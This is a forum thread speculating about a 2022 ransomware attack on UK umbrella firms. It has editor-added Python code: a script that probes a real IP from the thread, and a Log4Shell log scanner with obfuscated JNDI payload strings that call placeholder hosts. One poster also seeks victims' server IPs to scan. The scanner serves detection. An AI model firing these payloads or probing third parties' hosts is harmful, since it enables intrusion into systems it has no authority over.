
FirstFreelance Hacked Too


    #11
    Originally posted by agentzero:

    There are some options here, assuming this is true for a minute: they ran this server in the same cloud VPC with all other services, perhaps even the database. It's then possible databases were unencrypted and they acquired other passwords to crucial services and so extracted those before installing ransomware.

    If this is an on site installation and not cloud, then it's possible the hackers have taken everything and encrypted much other stuff, including backups. These companies don't hit me as being knowledgeable about IT or architecture. Due to the large number of mess ups they have made, I hope they are one way encrypted with ransomware and can't return to service.

    I have sympathy for the normal human workers affected and contractors affected by this. I have no sympathy for the management, as they have been awful for a few years now and there has been fair warning on this forum, including my own experience that saw a friend I helped recover from a lot of money lost due to managers in one of these firms lying about submitting accounts and Companies House striking off the company, with all bank accounts frozen. He had just lost his wife to covid. Court date still awaits.
    I left IT before Azure and cloud became cool beans. I was a Microsoft guy before that. I am guessing everything was on the same box and probably onsite too. I don't know to what extent they are using AWS/Azure or other cloud services. Another post here suggested that the VOIP phone system was on the same VLAN as everything else!

    The irony is that based on who their punters are a few words in the right ears and a few payslips bumped up by a few hours could have prevented this from ever happening!
    Former IPSE member



      #12
      Originally posted by eek:
      Actually it's just part of the Optionis group so part of Parasol/NW so it's the same attack

      Acquisition of First Freelance by Optionis Group Limited - BDO
      Good research Eek. Given that Brookson are affected too, are we really sure Brookson are still independent of Parasol?

      If someone can PM me some details about the server, such as IP address range or specific IP addresses, I can look at history of that target and try to gain some more information. I can't see IP address ranges owned by Parasol yet, but all things are possible given enough time.



        #13
        Originally posted by agentzero:

        Good research Eek. Given that Brookson are affected too, are we really sure Brookson are still independent of Parasol?

        If someone can PM me some details about the server, such as IP address range or specific IP addresses, I can look at history of that target and try to gain some more information. I can't see IP address ranges owned by Parasol yet, but all things are possible given enough time.
        30 seconds of research

        Ultimate owner of Brookson is Riverside Partners

        Ultimate owner of Optionis are Sovereign Capital Partners Llp

        so completely different.
        Last edited by eek; 26 January 2022, 15:30.
        merely at clientco for the entertainment



          #14
          To the mods: I don't want to overstep the boundary here, but I am not doing anything malicious in looking this information up:


          https://viewdns.info/iphistory/?doma...onwilliams.com

          https://viewdns.info/iphistory/?doma...solgroup.co.uk

          https://viewdns.info/iphistory/?doma...ccountancy.com

          There is no auto-redirect from pre-2022 IP addressing from HTTP to HTTPS, as an example:

          http://93.93.226.228

          Still exists as a webpage. The HTTPS certificate, unusually reached without a redirect from HTTP, is assigned to: practiceweb.co.uk

          The DNS does redirect from HTTP to HTTPS automatically to lead to: https://www.practiceweb.co.uk/


          There is no blame to be assigned to PracticeWeb, instead this is an example of a central account service or software that is a possible access point for hackers.


          If we check the more recent 15th December changes to Cloudflare:

          https://104.248.163.222/

          Again, the DNS and certificate show this is SJDaccountancy. This leads to: https://wordpress-663177-2175960.cloudwaysapps.com/

          If anybody has used SJD, are they familiar with this cloudwaysapps.com suffix?

          As much as misconfigured Cloudflare is possible, it is far more likely access and elevated privilege credentials were obtained before the move to Cloudflare in December. It is worth noting that parasolgroup.co.uk doesn't register a move to Cloudflare, so I'll move on to focusing on that IP range and look at vulnerability tracking history for this range.
          Last edited by agentzero; 26 January 2022, 15:40.

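The post above does three checks by hand: whether a legacy IP still answers on plain HTTP, whether it redirects to HTTPS, and which name is on the certificate it presents. The script below is an added example that scripts those checks; it is not the poster's tooling and it does not reproduce the viewdns.info history lookups (those come from that site). The practiceweb.co.uk names in the test data are the ones quoted in the post, not the result of a live lookup, and the default target is the IP quoted above.

```python
import http.client
import socket
import ssl
import sys
from urllib.parse import urlsplit


def classify_http(status, headers, host):
    """Classify a plain-HTTP response by where it sends the client.

    headers is a dict of response headers (any key case)."""
    location = next((v for k, v in headers.items() if k.lower() == "location"), None)
    if 300 <= status < 400 and location:
        parts = urlsplit(location)
        if parts.scheme.lower() == "https":
            return "redirects-to-https:" + (parts.hostname or host)
        return "redirects-elsewhere:" + location
    if 200 <= status < 300:
        return "serves-plain-http"      # content served over HTTP, no redirect
    return "status-%d" % status


def cert_names(cert):
    """DNS names a certificate is issued for, in ssl.getpeercert() dict form."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.append(value)
    return names


def name_matches(pattern, host):
    """Exact match, or a single leftmost wildcard label (*.example.com)."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern == host:
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host.count(".") == pattern.count(".")
    return False


def cert_covers(cert, host):
    """True if the certificate names the host you expected that IP to serve."""
    return any(name_matches(n, host) for n in cert_names(cert))


def probe(target, timeout=5):
    """Live check of one IP or hostname (needs network; not used by the tests)."""
    conn = http.client.HTTPConnection(target, 80, timeout=timeout)
    conn.request("GET", "/", headers={"Host": target})
    resp = conn.getresponse()
    http_result = classify_http(resp.status, dict(resp.getheaders()), target)
    conn.close()

    # Verify the chain against the system trust store but not the hostname:
    # the point is to see which name the IP answers with, so a mismatch is
    # a finding, not an error.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    with socket.create_connection((target, 443), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=target) as tls:
            names = cert_names(tls.getpeercert())
    return http_result, names


if __name__ == "__main__":
    # IP quoted in the post above; pass others on the command line.
    for t in sys.argv[1:] or ["93.93.226.228"]:
        print(t, *probe(t))
```

A "serves-plain-http" result plus a certificate for an unrelated name is exactly the pattern described in the post: the address is still live and belongs to a shared hosting provider, which says nothing on its own about who was compromised.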


            #15
            agentzero, I'm at a complete loss as to what you are saying there,

            A number of forward-facing marketing websites (as that is all the core www.xyz.com sites are) are now pointing at an IP address of a firm that does website marketing for professional service firms (i.e. accountants).

            merely at clientco for the entertainment



              #16
              I love all the conjecture (someone always wants it to be a disgruntled ex-employee), but I suggest Occam's razor should be at play here, i.e. a software vulnerability is being used against the various umbrella/finance companies and those that want to benefit from that are working their way through the IP address stack across the public-facing internet looking for targets. Our life-lens means it looks like this subset of companies is being targeted, but that's not necessarily the case. I'd not assume the same attacker for each and every target either.

              But, if we're doing conjecture, I'm going with the Log4J vulnerability that was identified at the end of last year.
              Last edited by Paralytic; 26 January 2022, 16:04.



                #17
                Originally posted by eek:
                agentzero, I'm at a complete loss as to what you are saying there,

                A number of forward-facing marketing websites (as that is all the core www.xyz.com sites are) are now pointing at an IP address of a firm that does website marketing for professional service firms (i.e. accountants).
                A complete loss or partial loss?

                One has to look at past IPs referenced to determine the value vs effort in looking at vulnerability tracking websites, rather than waste time. If a common accounting package or software is at one of those IPs, I would look further into that, given the nature of Parasol's business. If it was a tyre company at that IP, I wouldn't bother looking further.

                The more interesting thing is that Parasol/SJD have left their cloudwaysapps server online but redirected the DNS that led to this elsewhere. To save me time, it's easier if somebody can reference the .aspx/.asp server mentioned, as otherwise it takes at least 24 hours to perform a scan of all IPs and their vulnerability history, and as you mention Eek many of these will be reassigned IP addresses.

                As Paralytic has mentioned, there is a high chance that this is the log4j vulnerability in action. Even if it was patched, other issues emerged. There is still no patch that leads to a 100% fix yet.
                Last edited by agentzero; 26 January 2022, 16:06.

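Posts #16 and #17 put Log4Shell (CVE-2021-44228, the Log4j JNDI lookup bug) forward as the likely entry point but give no way to look for it. The scanner below is an added example from the editor, not from any poster: it runs over a few constructed access-log lines (not real Parasol/SJD logs; the addresses are documentation ranges) and unfolds the obfuscations commonly used to dodge naive signatures (`${lower:…}`, `${upper:…}` and the `${…:-x}` default-value trick) before looking for the `${jndi:` lookup and pulling out the scheme and callback host.

```python
import re

# Constructed sample lines in combined log format. The payloads sit in the
# User-Agent field, which web apps commonly hand to Log4j for logging.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2021:02:14:07 +0000] "GET / HTTP/1.1" 200 5123 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.8 - - [11/Dec/2021:02:15:22 +0000] "GET /login HTTP/1.1" 200 812 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/b}"
203.0.113.8 - - [11/Dec/2021:02:15:40 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/c}"
198.51.100.4 - - [11/Dec/2021:02:16:01 +0000] "GET /about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# An innermost ${...} lookup: one with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup we are hunting for, once the layers around it are unfolded.
_JNDI = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*)://([^/}\s]+)", re.IGNORECASE)


def _unfold(match):
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)          # leave it in place; this is what we report
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                   # ${name:-default} -> default, so ${::-j} -> j
        return body.split(":-", 1)[1]
    return match.group(0)              # unknown lookup type: leave untouched


def normalize_lookups(text, max_rounds=20):
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_unfold, text)
        if new == text:
            break
        text = new
    return text


def scan(log_text):
    """Return (line_number, scheme, callback_target) for each JNDI lookup found."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for scheme, target in _JNDI.findall(normalize_lookups(line)):
            hits.append((lineno, scheme.lower(), target))
    return hits


if __name__ == "__main__":
    for lineno, scheme, target in scan(SAMPLE_LOG):
        print("line %d: JNDI lookup via %s to %s" % (lineno, scheme, target))
```

The unfolding covers only the lookup tricks shown here; real signature sets are longer, and the string can arrive in any field an application logs (headers, form values, usernames), not just the User-Agent. A hit is worth chasing to the callback host; no hit proves nothing.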


                  #18
                  Originally posted by agentzero:

                  A complete loss or partial loss?

                  One has to look at past IPs referenced to determine the value vs effort in looking at vulnerability tracking websites, rather than waste time.

                  The more interesting thing is that Parasol/SJD have left their cloudwaysapps server online but redirected the DNS that led to this elsewhere. To save me time, it's easier if somebody can reference the .aspx/.asp server mentioned, as otherwise it takes at least 24 hours to perform a scan of all IPs and their vulnerability history, and as you mention Eek many of these will be reassigned IP addresses.

                  As Paralytic has mentioned, there is a high chance that this is the log4j vulnerability in action. Even if it was patched, other issues emerged. There is still no patch that leads to a 100% fix yet.
                  But you are looking at the marketing / sales pitch websites not the background portals where the real work is done.

                  You need to identify what the urls for those portals were and track those not the marketing pages on the (probably wordpress based) branded sales and blog website.
                  merely at clientco for the entertainment



                    #19
                    I have only the slightest understanding of the techy stuff here. It would be too good to be true, I suppose, that these awful companies never reopen because all their systems are wrecked?

                    If that were to come to pass, it would be mildly inconvenient for some contractors (who for their own good should have moved their business accounts anyway). But overall it would be very good for the future of the industry.

                    I guess it's just too good to be true though.
                    Public Service Posting by the BBC - Bloggs Bulls**t Corp.
                    Officially CUK certified - Thick as f**k.



                      #20
                      Originally posted by Paralytic:
                      I love all the conjecture (someone always wants it to be a disgruntled ex-employee), but I suggest Occam's razor should be at play here, i.e. a software vulnerability is being used against the various umbrella/finance companies and those that want to benefit from that are working their way through the IP address stack across the public-facing internet looking for targets. Our life-lens means it looks like this subset of companies is being targeted, but that's not necessarily the case. I'd not assume the same attacker for each and every target either.

                      But, if we're doing conjecture, I'm going with the Log4J vulnerability that was identified at the end of last year.
                      Occam's razor would suggest ransomware though. And they have shut down/disconnected all other systems to prevent destruction of more information whilst they isolate it. **** the punters for now, they just want to avoid a huge Bitcoin bill.
                      See You Next Tuesday

